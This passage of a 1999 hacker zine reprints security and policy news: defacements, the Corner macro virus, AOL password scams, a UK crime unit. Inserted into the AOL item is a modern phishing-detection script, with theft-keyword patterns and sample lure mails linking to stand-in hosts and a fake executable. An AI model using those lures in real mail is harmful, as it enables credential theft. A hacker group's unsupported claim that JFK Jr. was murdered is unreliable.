It concludes that there are "no show-stoppers in international law" for the types of information operations "as now contemplated" by the Pentagon as long as existing legal obligations are followed. The Counsel's report is silent on covert cyber-warfare that might be "contemplated" by other agencies.

William M. Arkin can be reached for comment at william_arkin@washingtonpost.com

© Copyright 1999 Washington Post.Newsweek Interactive

@HWA

20.0 England To Launch High Tech Crime Unit
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by no0ne

An anti-computer crime team is expected to be formed in London next year, composed of specialist police officers, security people from both MI6 and MI5, and experts from academia and industry. The team will be called the "High Tech Crime Unit" and will have units covering various computer crimes, spanning computer intrusion, pornography, counterfeiting, and fraud.

The London Independent
http://199.97.97.16/contWriter/cnd7/1999/10/25/cndin/8263-1466-pat_nytimes.html

British Police Launch a Cyber Squad to Combat Internet Crime

JASON BENNETTO
c.1999 The Independent, London

LONDON -- A national police squad is to be set up to tackle the growing menace of computer and Internet crime. A confidential police assessment shows that "cyber-crime" in Britain is growing -- it includes such activities as money laundering, pornography, counterfeiting, hacking, and fraud.

The new computer crime team is expected to include experts from universities and the electronics industry, intelligence from the security services MI6 and MI5, as well as specialist police officers. The squad is expected to be based at the National Criminal Intelligence Service (NCIS) in London.

Ministers have given their backing to the idea and the police intend to ask Home Office officials next month for extra funding for the project.
The police have already taken advice from code-breaking experts at the National Security Agency, the American intelligence organization, and plan to exchange information with the FBI.

The squad is expected to be called the "High Tech Crime Unit" and will have "cells" or specialist sectors to deal with different types of cyber-crime. They will cover a range of areas, which have been identified in a report by the Association of Chief Police Officers (ACPO), that include fraud, pornography, pedophile activity, spreading race hate, counterfeiting, gambling, hacking and stealing information, software piracy, money laundering, and sabotage involving computer viruses.

The unit follows growing unease among chief constables and John Abbott, the director general of NCIS, about the growth in crime committed using computer systems and the Internet. Millions of pounds are lost every year as criminals switch from traditional methods of law-breaking to cyber offences where there are fewer risks of being caught.

David Phillips, the chief constable of Kent and head of the ACPO's crime committee, said: "Traditional crimes - deception, fraud, pornography, swindles of all kind - are taking place via the Internet. We have to go on the offensive as hunters in this sea of information.

"You have to go into deep battle and attack criminals whenever they surface."

He argued that the lack of a specialist team meant that "at present we are almost blind."

He said: "We recently had discussions with [computer experts from] the USA who told us they were dealing with millions of pounds of criminal transactions. They are just mind-boggling levels of crime."

He added that the squad, which is likely to be set up next year, would link up with forces throughout the country.
-----
(Distributed by New York Times Special Features)

@HWA

21.0 First Project Macro Virus Discovered
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by nvirB

Corner is suspected to be the first virus to infect MS Project files. This macro virus can travel between MS Word and MS Project. It does not have a malicious payload and does nothing but replicate. Corner even has a nice little poem at the end of its code. The poem is from Joy Division's song "Twenty-four hours", taken from their 1980 album titled "Closer".

Data Fellows
http://www.data-fellows.com/v-descs/corner.htm

F-Secure Virus Information Pages

NAME: Corner
ALIAS: Project virus, P98M

Corner is the first macro virus to infect the Microsoft Project application. This virus infects both Project and Word and can travel between them.

When an infected document is opened in Microsoft Word 97 or 2000, P98M/Corner.A checks if Microsoft Project is running. If it is, it gets infected. The Word part of the virus is a simple class infector. It spreads when an infected document is closed. At this time it sets the Office 2000 security settings to low, disables the "Tools/Macros" menu and turns off the macro virus protection. After that the virus replicates to all opened documents. Corner is not able to infect Microsoft Word 2000, unless the user has first changed the security settings to medium or low.

To infect Project, the virus adds a new blank project and inserts the virus code into the "ThisProject" class module.

When an infected document is opened in Microsoft Project 98, Corner.A infects the Word application, even if it is not running. The MS Project part of the virus is not resident, and it does not infect the global project. The virus replicates during the project deactivation (after an infected project has been opened). The virus infects the Word application by opening it and inserting the virus code in the global template's class module "ThisDocument".
This process is hidden from the user and the user can't see the infection of Word.

Corner.A virus contains the following comments at the end of its code:

'I never realized the lengths I'd have to go
'All the darkest corners of a sense
'I didn't know
'Just for one moment
'hearing someone call
'Looked beyond the day in hand
'There's nothing there at all
'Project98/Word97-2k Closer

The text is from Joy Division's song "Twenty-four hours", taken from their 1980 album titled "Closer".

Corner does not do anything but replicate.

[Analysis: Katrin Tocheva and Sami Rautiainen, Data Fellows]

@HWA

22.0 Microsoft Web Page Defaced
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

The web site for Microsoft's Conference Management Server was defaced late Sunday evening and was still not fixed over 24 hours later. The defacement consisted of two separate index files and was not one of the main pages. This defacement joins several military servers that have recently been defaced including US Army Reserve Command, White Sands Missile Range, Navy Management System Support Office, Department of Veterans Affairs and others.

Attrition Mirror
http://www.attrition.org/mirror/attrition/

@HWA

23.0 Rubi-Con Wants You!
     ~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by locutus

Rubi-Con organizers have issued an official call for speakers. Rubi-Con 2000 is scheduled for April 28-30, 2000 in Detroit, Michigan. Speakers even get free goodies like extra free passes for your friends and a free t-shirt. WooHoo!

Rubi-Con
http://www.rubi-con.org

@HWA

24.0 Clinton Signs Phone-Tracking Bill Under 911 Cover
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Brian Oblivion

A provision of a bill that makes 911 the official emergency number across the country has been signed into law.
One provision of this law directs the Federal Communications Commission to help states develop systems that can automatically locate cellular callers who have dialed 911. The new system will probably take advantage of GPS to locate callers. The law also calls for "automatic notification when a vehicle is involved in an accident." (The potential abuses of these new systems are frightening.)

Associated Press
http://library.northernlight.com/EC19991026990000010.html?cb=200&dx=2006&sc=1#doc

Story Filed: Tuesday, October 26, 1999 5:04 PM EDT

WASHINGTON (AP) -- President Clinton signed legislation Tuesday making 911 the official emergency number nationwide -- for both regular and cellular phones. The measure also calls for development of technology that can track mobile callers.

"People with wireless phones now will be able to speed responses to highway accidents, crimes and natural disasters," Clinton said. "Getting rapid care to someone who is suffering from a heart attack or is involved in a car crash can mean the difference between life and death."

While 911 is widely used as the emergency number for traditional phones, there are 20 different codes for wireless callers across the country. The changes are aimed at cutting response times for the crews who answer 98,000 emergency calls daily from cellular phone callers.

"In my home state," said Sen. Conrad Burns, R-Mont., "three quarters of the deaths in rural areas are because the first responders couldn't get there in time."

Health care professionals joined Burns at a Capitol Hill news conference to applaud the new law.

"We have great emergency room personnel. We can do a lot for accident victims if we can find them and get them there," said Barbara Foley of the Emergency Nurses Association.
"That's what this legislation helps us do."

Another provision of the act directed the Federal Communications Commission to help states develop emergency systems, including technology that can automatically locate cellular callers who have dialed 911 or been involved in an accident.

The FCC in September moved forward with plans to require that cellular 911 calls automatically provide a caller's location. Regulators want manufacturers to begin providing locator technology within two years.

Privacy advocates have raised concerns about potential abuse of the technology, which would take advantage of the Global Positioning System developed by the military.

The law signed Tuesday called on regulators to establish "appropriate privacy protection for call location information," including systems that provide automatic notification when a vehicle is involved in an accident. It said that calls could only be tracked in nonemergency situations if the subscriber had provided written approval.

"The customer must grant such authority expressly in advance of such use, disclosure or access," according to Senate documents detailing provisions of the legislation.

An estimated 700 small and rural counties have no coordinated emergency service to call -- even with traditional phones. The bill would encourage private 911 providers to move into those areas by granting the same liability protections to wireless operations that now are offered to wireline emergency service systems.

Separately, the FCC took action earlier this year to increase the number of cellular calls to 911 that are successfully completed. The commission required that new analog cellular phones -- not existing phones -- be made with software that routes 911 calls to another carrier when a customer's own service cannot complete the call.
Calls sometimes aren't completed because a caller is in an area where his or her carrier does not have an antenna, because networks are overloaded or because buildings or geography block signals.

Digital phones, of which 18.8 million now are in use, were not covered by the new FCC rules adopted in May because such phones are more complex than their analog counterparts and there is no easy fix for the problem.

Copyright © 1999 Associated Press Information Services, all rights reserved.

@HWA

25.0 Carry Tax on Dollars Proposed
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Br0k3

A new tax proposed by Marvin Goodfriend, a senior vice president at the Federal Reserve Bank of Richmond, would cost you money the longer you held cash without depositing it. This Carry Tax would be deducted from each bill upon deposit according to how long the bill was in circulation. According to Goodfriend this would have the effect of discouraging people who 'hoard' currency, deterring black market and criminal activities, and boosting economic stability during deflationary periods. (Before you know it they will be putting cellular tracking devices in your money so when it gets stolen it can be recovered.)

Wired
http://www.wired.com/news/politics/0,1283,32121,00.html

Cash and the 'Carry Tax'
by Declan McCullagh

3:00 a.m. 27.Oct.1999 PDT

WASHINGTON -- US currency should include tracking devices that let the government tax private possession of dollar bills, a Federal Reserve official says.

The longer you hold currency without depositing it in a bank account, the less that cash will be worth, according to a proposal from Marvin Goodfriend, a senior vice president at the Federal Reserve Bank of Richmond.

In other words, greenbacks will get automatic expiration dates.

"The magnetic strip could visibly record when a bill was last withdrawn from the banking system.
A carry tax could be deducted from each bill upon deposit according to how long the bill was in circulation," Goodfriend wrote in a recent presentation to a Federal Reserve System conference in Woodstock, Vermont.

The 34-page paper argues a carry tax will discourage "hoarding" currency, deter black market and criminal activities, and boost economic stability during deflationary periods when interest rates hover near zero. It says new technology finally makes such a scheme feasible.

"Systems would have to be put in place at banks and automatic teller machines to read bills, assess the carry tax, and stamp the bills 'current,'" the report recommends.

Goodfriend said in an interview that banks might place a kind of visible "date issued" stamp on each note they distributed. "The thing could actually stamp the date when the bill comes out of the ATM," he said.

Congressional critics say they would oppose any such move.

"The whole idea is preposterous. The notion that we're going to tax somebody because they decide to be frugal and hold a couple of dollars is economic planning at its worst," said Representative Ron Paul (R-Texas), a free-market proponent who serves on the House Banking committee.

"This idea that you can correct some of the evil they've already created with another tax is just ridiculous," Paul said.

Other economists say a carry tax is not a wise plan.

"This is going beyond taxing banks for holding reserves. It's taxing the public for holding currency too long. That's even more wild an idea," says George Selgin, a University of Georgia economics professor who specializes in monetary policy.

"There are sweeping implications of these suggestions beyond whatever role they might play in thwarting a deflationary crisis... I think it's a very dangerous solution to what may be a purely hypothetical problem," Selgin said.

Goodfriend discusses an alternative: The Fed should at times prevent Americans from withdrawing cash from their bank accounts.
"Suspending the payment of currency for deposits would avoid the cost of imposing a carry tax on currency." But he concludes that such a move would have "destabilizing" effects, and recommends that the Federal Reserve instead "put in place systems to raise the cost of storing money by imposing a carry tax." The idea has been discussed before. Economist John Keynes mentioned the possibility, but dismissed it because of the administrative hassles involved. Silvio Gesell, a Keynes contemporary and like-minded thinker, also suggested taxing money to allow lower interest rates. But Goodfriend says that technology has advanced since then. "In light of recent advances in payments technology and the less-than-satisfactory alternatives, imposing a carry tax on money seems an eminently practical and reasonable way [to proceed]," he writes. He said the Federal Reserve has technology that would make it "feasible," but refused to give details. One reason for a carry tax, he says, is the reduced influence of the US central bank when prices are not increasing and inflation is close to zero. During such a period, banks are less likely to make loans -- even if the Fed tries to spur an economic expansion through open market operations. But if the government taxes the currency holdings of individuals and banks through an occasional carry tax, they may be inclined to lend money even at a negative interest rate in order to avoid holding on to it. "This proposal is made well in advance of any problem we have in the US. It's not an emergency proposal at this point," he said. The report says Congress would have to pass legislation allowing such a tax. @HWA 26.0 $250 Million in Police Tech Approved ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Br0k3 Part of the $39 billion fiscal 2000 appropriations bill that funds the departments of Commerce, Justice and State includes $250 million for law enforcement technology. 
$130 million of the money will be used for the Crime Identification Technology Program which will help local communities participate in national crime databases and improve crime laboratories. Monies are also earmarked for upgrades and increased management of various systems as well as development of multi-jurisdictional, multi-agency communications systems.

Civic.com
http://www.civic.com/news/1999/oct/civ-law-10-26-99.html

Congress Approves $250 Million for Law Enforcement Technology

October 26, 1999

The House and Senate last week approved $250 million in funding for law enforcement technology as part of the $39 billion fiscal 2000 appropriations bill that funds the departments of Commerce, Justice and State.

The $250 million compromise bill, approved during a House/Senate conference, comes after the original House version of the bill proposed taking $60 million from a trust fund to bankroll the high-tech projects and the Senate version earmarked $350 million for the effort.

According to the conference report, $130 million will be used for the Crime Identification Technology Program, which was born out of the 1998 Crime Identification Technology Act. The act established a five-year, $1.25 billion grant program for state and local governments to help local communities participate in national crime databases and improve crime laboratories.

Congress also included specific language in the report that outlined various uses for the money, including upgrades to criminal history and criminal justice record systems; improved management of criminal justice identification, such as fingerprint-based systems; integration of national, state and local systems for criminal justice purposes; and development of multijurisdictional, multiagency communications systems.

U.S. Sen. Mike DeWine (R-Ohio), a former prosecutor, championed the bill, which gained House and Senate approval Oct. 22.
"It is crucial [that] the dedicated men and women who are on the front line of crime-fighting efforts have access to advanced technology," DeWine said. "Crimes today are being committed with the use of technology, so it only makes sense that they be solved with advanced technology."

The bill also provides funding for two $7.5 million grants that cover individual state efforts in high-tech law enforcement. Kentucky received a grant for a statewide law enforcement program, and the Southwest Alabama Department of Justice will use the money to integrate data from various criminal justice agencies.

States also will receive $30 million in grants to reduce their DNA backlogs and for the Crime Laboratory Improvement Program.

The bill also includes $15 million for Safe Schools technologies, which are geared toward providing more effective safety techniques in the nation's schools, and $35 million for the Brady Act to upgrade criminal history records.

-- Dan Caterinicchia (danc@civic.com)

@HWA

27.0 Interview With Web Inventor
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Deepquest

Forbes magazine has an interesting interview with Robert Cailliau, the co-inventor of the World Wide Web. In the article Cailliau proposes some radical ideas, everything from a pay per page model of the internet to licensing all internet users.

Forbes
http://www.forbes.com/Forbes/99/1101/6411112a.htm

Regulate the Internet? The very idea sends shivers down a lot of spines. But one of the Web's inventors argues that only regulation can save it from its own excesses.

Bring in the Cyberpolice

By Christopher Watts

CYBERSPACE IS GETTING SCARY. Those sleazy porn sites. Viruses. Gaudy ads. Unstoppable spam e-mail. You click "okay" on an e-commerce item and hope that your money doesn't vanish into some Internet bandit's account in Lagos. If things get much worse, logging on to the Net may be as perilous as straying into a bad part of town after dark.

An exaggeration?
Robert Cailliau, the co-inventor of the World Wide Web, doesn't think so. "There was a time when the community that was on the Net was homogenous and civilized," sighs Cailliau. "Now it's not. We're in the middle of chaos. It may calm down. But the alternative is that there's a total meltdown of the system and that it becomes unusable. That would be a catastrophe. We must regulate [the Web] if we want to have some civilization left. And it's getting urgent."

As staffers in the early 1990s at Geneva's European Laboratory for Particle Physics (a 20-country research collaboration known by its French acronym, CERN), Cailliau and a now high-profile British colleague, Tim Berners-Lee, developed the address formats and other standards to create the World Wide Web. Berners-Lee is now at the Massachusetts Institute of Technology and has just published a book titled Weaving the Web: The Original Design and Ultimate Destiny of the World Wide Web by its Inventor (HarperCollins, San Francisco). Today the lower-profile Cailliau, a 52-year-old Belgian native, heads Web communications at CERN and spends much of his time with the International World Wide Web Consortium, a standards-setting body.

How would Cailliau make the Web more civil and less chaotic? His controversial idea is that we should find some means other than banner ads to finance it. "The forced influence of advertising has given us completely useless TV," he notes. "You don't want that on the Net. But most on-line information providers need to attract advertising--which slows downloads and clutters the screen with windows." The bandwidth explosion will solve the speed problem, but it won't address the clutter problem.

To reduce the Web's dependence on advertising, Cailliau proposes a so-called micropayment system, wherein Web surfers would pay a few cents every time they download a page from the Web.
"It would change the landscape completely if [Web-site owners] could live by providing a high-quality, responsive service," says Cailliau.

License all Internet users the way automobile drivers must be licensed....

How would the micropayments idea work? Cailliau replies: "An article from a newspaper would [cost users] something on the order of a cent or less, but a really hot item could be several cents, depending on what the author thinks he or she can get away with. If you find it too expensive, you go somewhere else. The site that's too expensive loses clients."

Cailliau points to France's Minitel system, which operates over France Telecom's wires. From public or private terminals, Minitel users pay modest amounts for access to information on everything from movie schedules to restaurant reviews--with not an ad in sight. "You know what you're going to pay, and you know what you're going to get," says Cailliau.

But doesn't Minitel charge users according to time spent on-line, rather than per-page fees? "That's the wrong model," Cailliau concedes. "But even that bad model has been shown to be commercially successful--even today, parallel to the Web. I always believed that if we did not have the telecom monopolies in Europe at the time of Minitel's introduction--if anyone in all of Europe could have subscribed to it--it would have spread like wildfire. 'Minitel Version Two' would have been what the Web is now."

Cailliau's other proposal to save the Web from its own success: License all Internet users, the way automobile drivers must be licensed to use public streets. In defense of this controversial idea, Cailliau says: "To get a license, people would have to learn basic behavior: choosing an Internet service provider; connecting to the Web; writing e-mails; problem diagnosis; censoring your own computer; and setting up a site. More important than that: knowing what dangers to expect and knowing how the Internet can influence others."
But wouldn't licensing, by making Internet users more traceable and accountable, run counter to the free spirit of the Web--which helped it develop so rapidly? And wouldn't licensing also crimp the Internet's power to fight Big Government's power? Perhaps. But Cailliau does insist on pointing out this: "If you operate a TV or radio station, you have to have a license. It has nothing to do with fundamental freedom. It has to do with protection of the average citizen against abuses."

Cailliau continues: "Everybody thinks that licenses are perfectly all right on the roads, because of the danger to life and limb. But one can equally cause a lot of harm by spreading false and dangerous information. Sooner or later someone is going to be able to trace the death of a person to an Internet act. Then [the licensing question] will probably be taken seriously."

@HWA

28.0 Computer Attacks Up Sharply in Hong Kong
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench

In the first eight months of 1999 there have been 138 reported cyber attacks compared with only 18 for all of last year, reported Senior Inspector Paul Jackson of the Police Computer Security Unit in Hong Kong.

South China Morning Post
http://www.technologypost.com/personal/DAILY/19991027102522210.asp?Section=Main

Published on Wednesday, October 27, 1999

PERSONAL COMPUTING

Hackers step up attacks on SAR

ERIC NG

The number of computer-hacking cases reported to police in the first eight months of this year was 138 compared with 13 for the whole of last year.

Senior Inspector Paul Jackson of the Police Computer Security Unit disclosed the figures yesterday during a seminar on Internet-related data protection organised by the Federation of Hong Kong Industries.

While the figures might suggest more organisations were willing to report hacking crime than previously, Inspector Jackson said "far too many organisations do not report hacking cases for fear of bad publicity".
He did not give figures on damage suffered by victims, saying it was difficult in many cases to qualify the monetary losses. The number of cases involving the private sector was not revealed.

Inspector Jackson cited one case under investigation in which the network of a large SAR organisation had suffered multiple hacking attacks for three months early this year before they were discovered.

"The source of the attacks was from overseas, but we don't know all the things the hacker might have done and therefore cannot be sure of the extent of damage," he said.

Meanwhile, an Internet auction case, still under investigation, involved Hong Kong fraudsters and multiple victims worldwide.

The number of Internet shopping fraud cases reported in the first eight months was 13, compared with one for the whole of last year.

Inspector Jackson said the application of laws on e-commerce fraud cases had been difficult as new types of frauds appeared all the time. "We are on a big learning curve [on e-commerce cases]," he said.

Inspector Jackson said his unit had maintained a close liaison with SAR Internet service providers and was trying to set up an informal group for them to share their experiences on computer crime and solutions.

Another speaker at yesterday's seminar, Director of Information Technology Services Lau Kam-hung, said the Government would set up its Secure Central Internet Gateway early next year, adopting internationally accepted security standards.

"It will protect the government bureaus and departments by means of fire-walls, virus-detection systems and pro-active intrusion-detection systems," he said.

Wired;

Crackers Penetrate MS Site
Wired News Report
4:00 p.m. 26.Oct.1999 PDT

Microsoft Web site cracked! For first time ever, a Microsoft site defaced! Says so right there in Tuesday's tech media headlines.

Well, sort of. Not really, said Microsoft.

"No part of the Web presence of Microsoft was compromised," said spokesman Adam Sohn.
"There's no new vulnerability here."

Then how to explain the message, "flipz was here and f0bic, your seksi voice helped me through the night heh. Save the world. Kill Bill," that appeared on a Microsoft's "Conference Management Server" Web site?

The answer, according to Microsoft, is that the site was indeed cracked. But it belonged to a lone Microsoft engineer's "test box," a standalone Web server the engineer used to test code. The server was not connected to either Microsoft.com or MSN.com or the Microsoft Intranet.

There are many such standalone servers, said Sohn, all of them outside the corporate Web ring.

"Obviously, this one was not properly patched," said Sohn. "The guy who put up the site, while he obviously knows a lot about information technology, probably wasn't paying too much attention" to security.

Nothing was compromised, said Sohn. So, properly speaking, fortress Microsoft.com remains unbreached -- at least by Web site spoofers.

It's not for lack of trying, said a weary-sounding Sohn. "People are banging on us constantly, all day, everyday from everywhere around the world."

@HWA

29.0 AOL Password Scams Abound
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

Remember the grandmother from Kansas City, North whose AOL account was used to send thousands of porn SPAMs? Well AOL password thieves have not stopped their shenanigans, everything from free offers to web page redirects to trojan horses, the methods are wide and varied but still abound.

Kansas City Star
http://www.kcstar.com/item/pages/business.pat,business/3773f414.a25,.html

DAVID HAYES: BITS & BYTES

Many Internet scams result in password theft

By DAVID HAYES - Columnist
Date: 10/25/99 22:15

Betty Anne Brown wants to make one thing perfectly clear: She is not the infamous Porno Grandma.

But for a brief time last month, hackers made it look as if she was playing one on America Online.
About 3,500 AOL subscribers across the country received e-mail from Brown's AOL account in September suggesting they go to a Web site offering "XXX Porn, For Free, For Real."

The Kansas City, North, mother and grandmother became one of thousands of AOL users who have been victimized by password thieves -- low-tech computer hackers who steal passwords to break into AOL accounts.

"I'm a very straight lady," the 66-year-old grandmother said. "It was a little embarrassing."

Brown thinks the password theft happened while she and her husband, Linn Brown, were traveling in Italy in September. The couple stopped at a storefront shop in Rome that offered Internet access for $5 an hour.

"It seemed like such a great opportunity when we were traveling," Brown said. "Postcards take so long to get back."

However, Brown thinks that while she was writing to friends and relatives to tell them about the trip, a hacker nabbed her login and password.

Stealing passwords, sometimes called "password fishing," is nothing new for AOL or other online services. However, as the number of AOL customers grows -- AOL announced Monday that the service now had more than 19 million subscribers -- the number of potential targets is growing also.

Some hackers use the passwords to break into accounts as they attempt to steal credit card numbers. Some use AOL e-mail to send out spam promoting adult Web sites or to try to steal additional passwords. And some just do it for kicks.

In the case of Brown, the thief sent out a porn notice. But a check found that the site, which had been set up on the free Angelfire community Web site, was apparently set up to steal credit card information. It was an adult Web site that requested credit card information -- but didn't really exist beyond the sign-up screen. The site has since been closed by Lycos Inc., which owns and operates the Angelfire site.
Brown said she discovered the scam when she started receiving irate e-mail from people who had received the notices from her account. She looked in her "sent mail" folder and found hundreds of sent e-mail notices, all alphabetized.

She wrote those who complained to apologize. "I don't know if they read it or not, but I thought it was the right thing to do," she said.

The Browns changed their passwords and assumed the problem was over. But just last week, AOL finally caught on to the problem and suspended the Browns' accounts. The couple found out about the suspension when they discovered that their passwords didn't work. They called AOL and explained the situation, and AOL restored their service.

Security always has been a big problem for AOL.

"It's been said, accurately, that AOL is a marketing company, not a technology company," said David Cassel, editor of AOL Watch, an e-mail newsletter with 50,000 subscribers.

In the "neighborhood watch" area of AOL, the online service lists dozens of scams used to steal passwords. Many read like this one:

"Dear America Online Member,

"Your account was given 6000 Minutes of America Online credits. This means you get AOL for free for 6000 minutes! Just Click Here to confirm the credit. Thank you America Online user."

Most likely, that link took the user to a site set up specifically to steal a user's password.

That's the fastest growing scam on AOL. An e-mail provides a Web site link and asks the person who receives it to click on the link. Some of those links lead to Web sites that quietly download a "Trojan horse" program that goes into a user's computer and looks to see if that person stored their AOL password on the hard drive. Others lead to bogus Web sites that look like AOL and ask the user to log in. Some are bogus adult sites that ask for credit card information.

The AOL neighborhood watch area was set up in response to a growing number of attempts to steal user passwords and credit card information.
"Never click on a link in an e-mail," said Rich D'Amato, an AOL spokesman. "AOL will never ask for your password or user name. Anyone pretending to ask for that information is not from AOL."

D'Amato suggested that surfers using the Microsoft Internet Explorer Web browser set the security setting on their software to "medium" or higher. The security setting, on the browser's toolbar under "tools" and then "Internet options," alerts users to any download that could be dangerous.

AOL also provides a free trial version of a virus software that users can download. The software, which expires after 30 days, can be downloaded each month for free, D'Amato said.

In Brown's case, it's possible her password was stolen by a hacker who installed a program on the computer in Rome that records each keystroke made by a user. The information can be retrieved remotely. D'Amato said users who travel should carry a copy of their virus software and its updates, and install the software on any computer they use to check for such programs.

Cassel, however, thinks AOL creates some of its own problems by being too secretive about the extent of the company's security problems.

"AOL is very publicity sensitive," Cassel said. "It creates the ideal atmosphere for hackers to operate in."

The experience hasn't dampened the Browns' enthusiasm for the Internet or AOL. The couple uses AOL to keep in contact with grandchildren, children and relatives, and for general research.

"I wanted people to know what can happen," Brown said. "It would have been so easy just to change my password and avoid all this."
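The scam pattern the column describes (a notice that claims to come from AOL, a link that leads to a look-alike login page, a trojan download or a bogus card-collection site, and a free-credit lure to make the reader click) can be screened for mechanically. The following is an added example written for this zine entry; it is not code from the Kansas City Star, AOL or the AOL "neighborhood watch" area. It scores a raw e-mail on the indicators the article lists: a claim to be AOL sent from a non-AOL domain, a link that leads off AOL's own hosts, "free minutes/credits" and "click here" lures, a request for a password or card number, and a link to an executable. The trusted-host list, the weights and thresholds, and the three sample messages are constructed assumptions, not AOL's real mail or infrastructure.

```python
"""Heuristic screen for AOL-style password-phishing e-mail (added example).

The sample messages, the trusted-host list and the scoring weights below are
constructed for illustration; they are not AOL's real mail or hosts.
"""
import re
from email import message_from_string
from email.message import Message
from urllib.parse import urlparse

# Hosts the provider itself legitimately uses (constructed allow-list).
TRUSTED_HOSTS = {"aol.com", "www.aol.com", "mail.aol.com"}

# (pattern, reason) pairs; each match adds one point to the score.
LURE_PATTERNS = [
    (r"\bfree\b.*\b(minutes|credits?|months?)\b", "free-service lure"),
    (r"\bclick here\b", "generic 'click here' call to action"),
    (r"\b(confirm|verify|validate)\b.*\b(account|credit|billing)\b",
     "asks the reader to confirm account details"),
    (r"\b(password|credit card)\b", "mentions password or card data"),
    (r"https?://\S+\.(exe|scr|bat|pif)\b", "link to an executable download"),
]

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)
HREF_RE = re.compile(r'href=["\']?(https?://[^\s"\'>]+)', re.I)


def sender_domain(msg: Message) -> str:
    """Domain part of the From: header, lower-cased ('' if absent)."""
    m = re.search(r"@([\w.-]+)", msg.get("From", ""))
    return m.group(1).lower() if m else ""


def body_text(msg: Message) -> str:
    """Body as text; joins the text parts of a multipart message."""
    if msg.is_multipart():
        return "\n".join(p.get_payload() for p in msg.walk()
                         if p.get_content_maintype() == "text")
    return msg.get_payload()


def is_trusted(host: str) -> bool:
    return host in TRUSTED_HOSTS or host.endswith(".aol.com")


def score_message(raw: str) -> dict:
    """Return {'score', 'verdict', 'reasons'} for one raw RFC 822 message."""
    msg = message_from_string(raw)
    text = body_text(msg)
    reasons, score = [], 0

    # 1. Brand impersonation: the mail invokes AOL but comes from elsewhere.
    claims_aol = re.search(r"america online|\baol\b",
                           text + " " + msg.get("From", ""), re.I)
    dom = sender_domain(msg)
    if claims_aol and dom and not is_trusted(dom):
        score += 3
        reasons.append(f"claims to be AOL but sent from {dom}")

    # 2. Links that lead away from the provider's own hosts.
    for url in set(URL_RE.findall(text)) | set(HREF_RE.findall(text)):
        host = (urlparse(url).hostname or "").lower()
        if not is_trusted(host):
            score += 2
            reasons.append(f"link to outside host {host}")

    # 3. Lure language from the scams the column quotes.
    for pat, why in LURE_PATTERNS:
        if re.search(pat, text, re.I | re.S):
            score += 1
            reasons.append(why)

    verdict = "phish" if score >= 4 else ("suspicious" if score >= 2 else "ok")
    return {"score": score, "verdict": verdict, "reasons": reasons}


# Constructed samples. The first is modelled on the notice quoted in the column.
PHISH_CREDIT_LURE = """From: America Online <aolcredits@aol-free-credit.example.net>
Subject: Your 6000 Minutes credit
Content-Type: text/html

Dear America Online Member,<br>
Your account was given 6000 Minutes of America Online credits. This means
you get AOL for free for 6000 minutes! Just
<a href="http://aol-free-credit.example.net/confirm">Click Here</a> to
confirm the credit. Thank you America Online user.
"""

PHISH_TROJAN = """From: AOL Security <security@aol.com>
Subject: Protect your computer
Content-Type: text/plain

Download our new virus scanner from http://updates.example.org/aolscan.exe
and enter your AOL password to activate it.
"""

LEGIT_NOTICE = """From: AOL Member Services <memberservices@aol.com>
Subject: Your monthly statement
Content-Type: text/plain

Your monthly statement is available. Sign on to AOL and go to keyword: Billing.
"""

if __name__ == "__main__":
    for name, raw in [("credit lure", PHISH_CREDIT_LURE),
                      ("trojan", PHISH_TROJAN), ("legit", LEGIT_NOTICE)]:
        print(name, score_message(raw))
```

The second sample matters for the point D'Amato makes: a spoofed From: address is not needed for the mail to be dangerous, so the screen scores the off-site link and the executable on their own and still reaches "phish" without the impersonation indicator.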
To reach David Hayes, technology reporter, call (816) 234-4904 or send e-mail to dhayes@kcstar.com

@HWA

30.0 United Loan Gunmen Return
~~~~~~~~~~~~~~~~~~~~~~~~~

Note: the ULG is erroneously referred to as the "United Lone Gunmen" the correct name is United Loan Gunmen, substitute where necessary - Ed

From HNN http://www.hackernews.com/

contributed by Code Kid

More new interesting defacements have joined the one done of the Microsoft site last Sunday. The Web Site of George Magazine has been defaced by the United Lone Gunmen, additional defacements included U.S. Navy Coastal Systems Center, Andersen AFB, and a slew of others.

Statement by ULG - via OSALL
http://www.aviary-mag.com/News/ULG_Speaks/ulg_speaks.html

Interview with Flipz - via OSALL
http://www.aviary-mag.com/Interviews/Flipz/flipz.html

Yesterday morning HNN mentioned that a Microsoft web page had been defaced two days prior. Not really big news, web page defacements happen on a daily basis, but the mainstream media picked it up and thought it was important enough to run a two day old story. Here are some of the links.

MSNBC
http://www.msnbc.com/news/327726.asp?cp1=1

UOL - Brazil
http://www2.uol.com.br/info/infonews/101999/26101999-19.shl

ABC
http://abcnews.go.com/sections/tech/DailyNews/mshack991026

Wired
http://www.wired.com/news/technology/0,1282,32142,00.html

Ultimahora - Portugal
http://ultimahora.publico.pt/barra-central.asp?id=5883

Statement by ULG

ULG Speaks
10/27/99
ULG

[Editor's Note: The following is an exclusive statement given to OSAll by members of United Lone Gunmen. This statement is in regard to the recent defacement of George Magazine by ULG. A mirror is available at Attrition.]

The reason behind the georgemag.com hack was more of a pro-hack than a hack bashing the administrator/organisation/etc. We of ULG believe JFK Jr. was murdered in his plane by a bomb implanted before take off.
